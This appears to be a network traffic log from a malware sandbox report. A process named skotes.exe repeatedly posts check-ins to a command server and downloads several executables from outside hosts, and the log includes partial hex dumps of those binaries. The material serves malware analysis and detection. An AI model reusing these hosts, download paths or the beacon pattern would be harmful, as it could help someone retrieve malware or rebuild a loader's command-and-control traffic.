Dec 14, 2024 23:58:10.386426926 CET	1236	IN	Data Raw: 7d 6b 7f 93 7a 87 f5 0e 3d 0a a1 d3 84 4a 93 eb 26 b9 52 69 d5 1d f5 0c 9f eb 81 31 9e e6 f9 c2 93 e1 04 3c f7 13 4f bb c6 21 c8 07 97 b7 78 a8 a7 61 88 7c 8d 28 fc 12 b0 0b f7 05 2b 29 ff 18 9f 84 b1 58 10 c4 1c 0d c1 e3 17 0a c0 05 13 12 bd f2 Data Ascii: }kz=J&Ri1<O!xa\|(+)X_/``zAmRAgxHIs6YuN(BHKe\|P&HI_z9f/UYKAjV=cAd"3E!?LJ&uu5sT'B
Dec 14, 2024 23:58:10.386461020 CET	1236	IN	Data Raw: eb 32 d3 16 3f e0 de 71 f7 88 b0 9c 58 7a 03 a0 d6 69 71 59 33 6d a5 d9 26 58 b1 0b b7 57 eb 85 54 92 38 de 46 e0 7b 59 94 bf bf eb bd 41 5b 81 e5 69 a0 9a b7 cf da a2 f8 17 02 4b fa 25 a1 3a 0e 5d 82 6c f5 79 32 eb 4f fc d6 18 56 6c f8 ec 0a f9 Data Ascii: 2?qXziqY3m&XWT8F{YA[iK%:]ly2OVlGoUw/d#H\|xyw*H1)&Y5FD?_"Tv,L o$z8`cT{wj{g39[-y'8n>g\|(K,,E_,(1YP9XB(ef
Dec 14, 2024 23:58:10.386493921 CET	448	IN	Data Raw: 01 39 53 58 f0 c3 af 92 89 5b 52 f6 2d 69 86 2e 00 42 92 8b dc b0 c7 82 76 0e 00 3a c5 59 bc 65 f5 12 6a c4 3d fa 7f b2 08 27 c1 04 37 87 bc 6b b7 25 cf f6 bb 2b 47 ee 34 dc 9e 8a 26 10 c5 84 95 95 51 59 61 c8 30 0c e4 8e fa e3 b6 90 04 84 1e fc Data Ascii: 9SX[R-i.Bv:Yej='7k%+G4&QYa0t9rE2"0XUEe4mm,tF4S/MFks&LrxNy6D8SsS)+2#lgH@V6S226
Dec 14, 2024 23:58:10.386883020 CET	1236	IN	Data Raw: 06 cc 72 61 9d 47 ab 12 2e f0 71 2f 47 2f 1f 1c 93 84 89 e3 e6 d8 00 16 db 9b 80 06 ae 5e 04 c6 30 c0 c7 c5 a6 91 8b 74 34 a5 c4 8e 24 9d 05 45 01 2b 60 19 79 56 9a eb ec 61 fa b2 23 0e b6 f1 ae db 59 63 45 9b 25 4b d3 b3 26 ac 5a 5f 36 97 5e 53 Data Ascii: raG.q/G/^0t4$E+`yVa#YcE%K&Z_6^S%X&b$;CkWC)6O-iL&9%0)NCON"b\Q3E>gH_kIJf<mjhx+9nv(fptFP
Dec 14, 2024 23:58:10.505307913 CET	1236	IN	Data Raw: 3e 73 ca d8 0c 17 85 85 95 b2 c7 16 53 13 9f 6b 74 32 cc 07 d4 09 88 42 91 8b 78 68 39 10 f0 18 16 22 af 04 02 d3 29 04 cc 35 b5 88 e0 9e 05 ad 18 a7 9b db e7 4b 89 dd 70 f8 5b b2 dc 06 b4 a6 bb 57 b7 25 f8 22 bf 94 83 fc db 10 14 73 db 33 1c 1a Data Ascii: >sSkt2Bxh9")5Kp[W%"s3t.z8,"P9ne))x$2w<;lD8[@.(0NzEZ5`?-A/9m"LJ]qtw6WMmUw07G)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49786	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:15.922658920 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015327001&unit=246122658369
Dec 14, 2024 23:58:17.275780916 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49793	31.41.244.11	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:17.397052050 CET	65	OUT	GET /files/206321495/ZiYbk6W.exe HTTP/1.1 Host: 31.41.244.11
Dec 14, 2024 23:58:18.723081112 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:18 GMT Content-Type: application/octet-stream Content-Length: 1752576 Last-Modified: Sat, 14 Dec 2024 22:12:26 GMT Connection: keep-alive ETag: "675e02ca-1abe00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 d2 37 48 62 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ea 00 00 00 08 00 00 00 00 00 00 00 60 45 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 45 00 00 04 00 00 fd 27 1b 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 40 01 00 69 00 00 00 00 20 01 00 08 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PEL7Hb`E @ E'@U@i A t @.rsrc @.idata @@ )`@frbjvewh@+@odinhcyc @E@.taggant@`E"@
Dec 14, 2024 23:58:18.723319054 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:18.723351002 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:18.723365068 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:18.724030018 CET	896	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:18.724045038 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:18.724060059 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:18.724786043 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: scr&;3)qV?0G>(258c{l/.NP<,AHDj%E)'q~~698CB
Dec 14, 2024 23:58:18.724802971 CET	672	IN	Data Raw: ac fa 68 48 2d f3 3c 6a c6 7d 96 f5 24 44 00 51 1b 47 20 83 2f 8d c3 c4 fb 4f d0 33 2e 5c 19 79 07 d4 e0 5b 37 f8 a1 85 e7 2f 5e 23 0b ed 23 ee ad 27 bb e6 22 de 19 c6 44 63 79 80 2f 96 3a 9c 41 36 40 0a c7 e7 d8 3d 9d e2 c3 6a d9 28 4c ce 66 02 Data Ascii: hH-<j}$DQG /O3.\y[7/^##'"Dcy/:A6@=j(Lf4J#0F0uB7-V,0kF%I@9,4j#KJAjCRRF@hC9iSFq'UoB,K45R4(By3 #FyV+/U
Dec 14, 2024 23:58:18.724823952 CET	1236	IN	Data Raw: 32 39 c6 32 4a 50 e0 d9 f7 39 dc e4 02 29 92 d2 ba ed b8 52 1a a2 e4 a4 1a f6 87 da 6f c3 cc 01 0f a2 c7 84 1d eb c0 48 2c 60 88 52 8e 38 25 52 34 39 0e b2 53 38 6e 6e 46 fc 00 06 d1 73 d7 7f ff ea b8 0f fd b2 a5 56 13 09 2c d4 32 51 55 6c f8 13 Data Ascii: 292JP9)RoH,`R8%R49S8nnFsV,2QUl.,gf,!2l@>s0/R?/}E6SF\b#*BU64u;;lV:E?=s0RIE9ZrG6b9Eoa9#McY[
Dec 14, 2024 23:58:18.843019962 CET	1236	IN	Data Raw: 3e ce 96 ec fe 39 c4 e9 fc 30 d8 78 90 b2 04 84 1c 8e 2a d4 8c 15 c0 74 32 3e ec 78 9f b7 aa ee f5 39 26 bf 1c b1 2d fd 95 c6 96 fa 8e 0f 84 56 20 f4 c2 65 b7 ad 00 73 b4 bb a2 70 2c 63 aa ac 2d 43 44 61 c3 35 8a 98 58 02 8d f1 0d 2d 88 c0 97 ce Data Ascii: >90x*t2>x9&-V esp,c-CDa5X-L?":ilB$WGsL9eXEL'EJI9@GFs9/K`;HcX<IM@{D2gvoo84i)A7_{FyyBG,M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49811	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:24.157840014 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015343001&unit=246122658369
Dec 14, 2024 23:58:25.565258980 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49813	185.215.113.16	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:25.709729910 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 14, 2024 23:58:27.041604042 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:26 GMT Content-Type: application/octet-stream Content-Length: 1870848 Last-Modified: Sat, 14 Dec 2024 22:32:01 GMT Connection: keep-alive ETag: "675e0761-1c8c00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 b2 00 00 00 00 00 00 00 00 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 4a 00 00 04 00 00 c6 d2 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELbYgJ@0J@T0h 1 H@.rsrc X@.idata 0\@ *@^@jaliwopm/`@chtmvbnbIf@.taggant0J"j@
Dec 14, 2024 23:58:27.041698933 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:27.041735888 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:27.042344093 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:27.042377949 CET	496	IN	Data Raw: 7d b6 49 3c d3 82 27 97 12 17 ee 1c 5a 81 e9 ad ee 5f ad cd c7 01 41 41 68 74 a9 82 aa 00 75 5b 21 81 4c be f7 73 82 45 76 f5 2c 35 c6 b9 23 a6 35 ba 63 04 ba c2 28 ee 39 89 8f 85 ec 8d 95 c1 8f a7 b5 00 a0 fc c3 08 4e fa 68 12 47 bc 28 c5 48 fa Data Ascii: }I<'Z_AAhtu[!LsEv,5#5c(9NhG(Hx<jteSR/)_zbn@(Zi7bj4T4?'<q}F(HO_^Q\o+[Y4dGgzH[!(N<u\|hbC(l5Z
Dec 14, 2024 23:58:27.042412043 CET	1236	IN	Data Raw: 1e c4 f7 d7 92 83 60 fe 25 cf bf 17 63 34 b4 e6 ee ff 5d 0a 53 42 dc 6d d4 05 65 3e b8 86 a5 90 8e 61 ca 8d 63 45 bc 47 be a7 09 cb 13 4d b2 c4 1a 5c 6c 13 e4 0f a1 df 36 43 49 e4 17 02 30 bf 7a ac 5f c3 69 6c 75 a7 9f c8 5a 73 90 92 6b c4 85 70 Data Ascii: `%c4]SBme>acEGM\l6CI0z_iluZskp\^ZW@S%q\hb1}~ jvlE\|-,<"wspYbyVwNsJhgV?&b2Be$6$Bku]gz6?Y3l
Dec 14, 2024 23:58:27.043271065 CET	1236	IN	Data Raw: 33 56 d6 7c b6 e9 b5 6d 1a 0b f4 ef 6c 81 01 a1 8b 5c ec df 99 a5 7b 2b 5c 54 6e ff df e1 81 ea 8f 94 cc 2a 40 c7 d1 df 23 02 bd dc 21 b3 37 35 0e f2 b3 a4 21 eb 03 e0 7a 2f d7 99 5a c4 d3 dc 92 f3 05 a6 e1 6f 6b 8b b8 98 74 85 24 a0 c4 ed 15 89 Data Ascii: 3V\|ml\{+\Tn*@#!75!z/Zokt$ L!rKTQ2\jtKX#,&E",@{JZPDr`p9fu=8v5~cG&r6uxOO[S1yx>BP/R\
Dec 14, 2024 23:58:27.043306112 CET	1236	IN	Data Raw: d1 31 1b 6c af df c2 1a 86 68 43 1d 96 7c c9 f3 c7 21 11 cc ac 63 8a 3e f1 c5 54 9d f8 e1 92 09 31 65 7b bd ca fe a8 0e c0 e2 99 3c 0d da c8 cd d3 80 a4 71 36 7f c9 7f f7 d4 5f 3b 2f 38 81 50 15 fc 6b 90 d8 22 1b 49 5a 49 6b 46 e4 46 78 b6 dd 82 Data Ascii: 1lhC\|!c>T1e{<q6_;/8Pk"IZIkFFxE6GPEo*'x%uh9ccs'HHvVx&W4j+Ap,I4;sBuCGz@ r?~x1PlC_wp(
Dec 14, 2024 23:58:27.043366909 CET	1236	IN	Data Raw: 4b 8d 61 9a 93 9c 9c c2 e6 76 e8 48 43 a8 1b 85 6c 78 7f 40 c1 23 2a 4d a4 7c 3f 04 8f ee f3 8f e4 85 66 3f 05 74 d2 62 80 d8 59 6e 26 58 3a e6 3d 00 ee e8 29 a1 ad c2 cd 43 1a 1f 44 1d 8b 3e 51 32 46 fe 73 6e 01 2b 17 e4 1c 41 14 f4 47 dc c6 d3 Data Ascii: KavHClx@#M\|?f?tbYn&X:=)CD>Q2Fsn+AGjhxaKx`nn/HKBq'b#IllIhjU}H4FE\|`^\p"$ibs,a**Y!S
Dec 14, 2024 23:58:27.043405056 CET	1236	IN	Data Raw: 0b fe ee 8f ae fa 3a ed 03 41 87 91 21 2d 94 9c 4c a5 27 a3 5e 2f b9 21 62 a8 ee a5 b1 ed e0 25 54 a9 33 a8 b8 4c 9f d8 8d e7 56 c5 bb 23 09 d1 b9 23 62 e5 4b 99 57 7e c8 4d ae c8 79 7b 84 20 e7 ec 96 86 43 d0 5d 4d 53 fc be 00 07 fa 39 90 e6 7c Data Ascii: :A!-L'^/!b%T3LV##bKW~My{ C]MS9\|naHM?li/Q{u.2HHfCjINrh\]iHQ2H95AAY6bsuBxk!*X_.]r&4AUb%kW}w]
Dec 14, 2024 23:58:27.161959887 CET	1236	IN	Data Raw: 91 8d d1 c9 2c 51 ab c0 92 73 9c d5 3e 60 d7 e9 61 99 6e 3a 12 72 d5 d0 f0 cd 97 dc 9d aa 76 bd 20 5e e2 b9 af f1 d3 ae c3 15 00 2e f1 09 6e 31 0e 96 7d 11 f6 74 73 a4 53 ad 56 0f 61 39 eb 30 3d 90 e9 f0 42 19 ea 6e 07 32 bf 9f 99 89 6e b3 42 a1 Data Ascii: ,Qs>`an:rv ^.n1}tsSVa90=Bn2nB%FD*TP@ua$8hV_a]P{7yqO0pI x6E(yn5t})uF!#5xK>%{R-Qi@QhaC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49835	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:33.297058105 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015352001&unit=246122658369
Dec 14, 2024 23:58:34.649131060 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49841	185.215.113.16	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:34.801881075 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 14, 2024 23:58:36.118057013 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:35 GMT Content-Type: application/octet-stream Content-Length: 1731584 Last-Modified: Sat, 14 Dec 2024 22:32:07 GMT Connection: keep-alive ETag: "675e0767-1a6c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 70 66 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 66 00 00 04 00 00 01 95 1a 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg*pf@f@M$a$$ $h@.rsrc$x@.idata $z@ ($\|@asolipaxM~@akodwsqo`fF@.taggant0pf"J@
Dec 14, 2024 23:58:36.118110895 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:36.118146896 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:36.118518114 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:36.118552923 CET	1236	IN	Data Raw: 87 e3 10 2c c9 9b 2b c9 89 a8 6c 40 97 60 cf e9 44 7c 93 df c8 58 da af 70 60 0b 0f 65 dc 03 db 58 1a fc c1 48 12 f4 e9 a3 b6 e6 6d aa 42 d2 bb c0 40 e4 bf bc d0 d3 fb 94 60 c7 98 2f 71 bb 88 85 64 af 97 7d de 03 c0 87 88 d7 17 6d 80 93 c0 4a 41 Data Ascii: ,+l@`D\|Xp`eXHmB@`/qd}mJA!6Mt{MXrKXKXd`R0r.~`DMglo# ra:kP,PD`J,VRY'l YQqz
Dec 14, 2024 23:58:36.118587017 CET	1236	IN	Data Raw: 5a 38 d2 83 66 50 08 c9 85 61 16 1d f1 95 68 31 ba 78 4f 79 57 40 9f b0 0f 3f af 53 56 70 42 91 fc ba 94 7e 4d bf 72 f0 ab b3 ab 41 21 b7 93 eb 73 f3 94 5a 2e 97 2e f0 4f fb 99 a9 b7 62 e1 32 0d a9 d0 5f cd cf 94 0e b5 d1 d1 3a 95 c0 93 2c d6 5f Data Ascii: Z8fPah1xOyW@?SVpB~MrA!sZ..Ob2_:,_d5<tin-- /AFQllSTvJW,)_D&_QZ>l/pn$\|f)bFqeG7o45N="&r9'b(^
Dec 14, 2024 23:58:36.119296074 CET	1236	IN	Data Raw: 86 ab fb 2b 5b d8 ac 57 cd 6a 99 b8 55 79 4c aa 5a fc 9c 3f 86 c9 83 c5 96 9a 43 b9 08 60 af 47 9d 3a a9 4d 0e a8 5b be 20 dc ad bf d0 9d 57 01 53 46 1a c1 4c 78 1f dc b5 6c 3e c5 26 1c a4 c7 8e 80 a1 bb 00 c9 b3 44 5b 22 e4 df 5a 68 db 2b 71 e1 Data Ascii: +[WjUyLZ?C`G:M[ WSFLxl>&D["Zh+q.Pw[+PZ/,,[#b+`^Hmgh?P@KIz2&pelvaTnh{iWRT<l0l^W)[#TlggCe_o[
Dec 14, 2024 23:58:36.119349003 CET	1236	IN	Data Raw: 4c 93 a1 e4 e6 84 73 34 ce ff 93 c3 e7 df 77 f2 94 6e 9b 0b cd e9 d6 ac 4d c8 93 bd c4 9d eb af b2 d3 2c 2f 55 69 cb c0 e8 dc cd bb 6d ba fc bb fc 6e ac 73 4d 70 16 38 91 ec f4 cf 24 6e cd a3 56 08 19 d1 7a b3 93 bf 71 f5 b3 09 95 ac fc c7 e8 9a Data Ascii: Ls4wnM,/UimnsMp8$nVzqZ+]Z2v^h0ufflIn3,`gI $h3P,HUMjULnkflGeh/1iYj/CWnV*
Dec 14, 2024 23:58:36.119381905 CET	1236	IN	Data Raw: 28 61 4c 36 57 ad 9c bb 88 06 90 bd 54 94 cf 53 cd a0 ca f1 1b 60 b3 e3 d8 8c a1 c8 e8 6d b4 2e cf 98 a1 b7 94 dc 63 35 8d 6b d4 ac b8 b8 a8 bd e5 60 a7 31 cf 55 96 2e 0e dd fa 17 4f 71 03 03 e5 71 d0 8b 57 f5 0b 2d 5b e0 d3 d6 d0 ec 59 be cc e8 Data Ascii: (aL6WTS`m.c5k`1U.OqqW-[Y?gbWz{1~M/[ez#3j.H]p`K2lGM5`{Z@+[v0]N^z4./MNw5tDI[
Dec 14, 2024 23:58:36.119942904 CET	1236	IN	Data Raw: b9 6e 9b 2b c9 54 17 ed 4a 5a 32 26 6d ec a4 e9 e0 69 07 32 57 45 8d d9 52 fc 0f be f4 7a 83 2a 74 2f 8d 40 11 14 cd b8 a4 e5 8f 2d 7c 6d a1 8f 06 59 bd e7 18 dc b7 83 67 ac 10 ea ef 7a a1 8b 56 44 94 8f e6 9a 20 b0 57 e8 36 28 5b 60 d8 2f 69 e5 Data Ascii: n+TJZ2&mi2WERz*t/@-\|mYgzVD W6([`/i'YzLjZ\|_Z OIymdn\|uml'j^y+[7pPn{,.Dn@yOpwLl\|s
